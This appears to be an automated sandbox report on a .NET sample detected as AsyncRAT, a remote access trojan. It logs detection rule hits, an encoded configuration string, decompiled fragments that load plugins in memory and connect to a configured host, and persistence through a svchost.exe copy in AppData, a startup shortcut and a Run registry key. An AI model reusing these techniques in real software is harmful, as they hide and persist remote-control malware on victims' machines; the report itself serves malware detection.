                    Source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: yF21ypxRB7.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: yF21ypxRB7.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: yF21ypxRB7.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: yF21ypxRB7.exe, Settings.csBase64 encoded string: 'Y3TBMzct0fB6CK9FPYM4ZIecyWQY3Lk9OU5z/LNFURJvaUTnYE30d0gTYCE4UAl8'
                    Source: svchost.exe.0.dr, Settings.csBase64 encoded string: 'Y3TBMzct0fB6CK9FPYM4ZIecyWQY3Lk9OU5z/LNFURJvaUTnYE30d0gTYCE4UAl8'
                    Source: yF21ypxRB7.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: yF21ypxRB7.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: svchost.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: svchost.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/5@3/2
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeMutant created: \Sessions\1\BaseNamedObjects\vnCrrKpdlb0ooKNR
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                    Source: yF21ypxRB7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: yF21ypxRB7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: yF21ypxRB7.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile read: C:\Users\user\Desktop\yF21ypxRB7.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\yF21ypxRB7.exe "C:\Users\user\Desktop\yF21ypxRB7.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                    Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\svchost.exe
                    Source: yF21ypxRB7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: yF21ypxRB7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: yF21ypxRB7.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: yF21ypxRB7.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: yF21ypxRB7.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: yF21ypxRB7.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: yF21ypxRB7.exe, Messages.cs.Net Code: Memory
                    Source: svchost.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: svchost.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: svchost.exe.0.dr, Messages.cs.Net Code: Memory
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B32A7 pushad ; ret 0_2_00007FFAAC5B32C1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFAAC5700BD pushad ; iretd 8_2_00007FFAAC5700C1

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
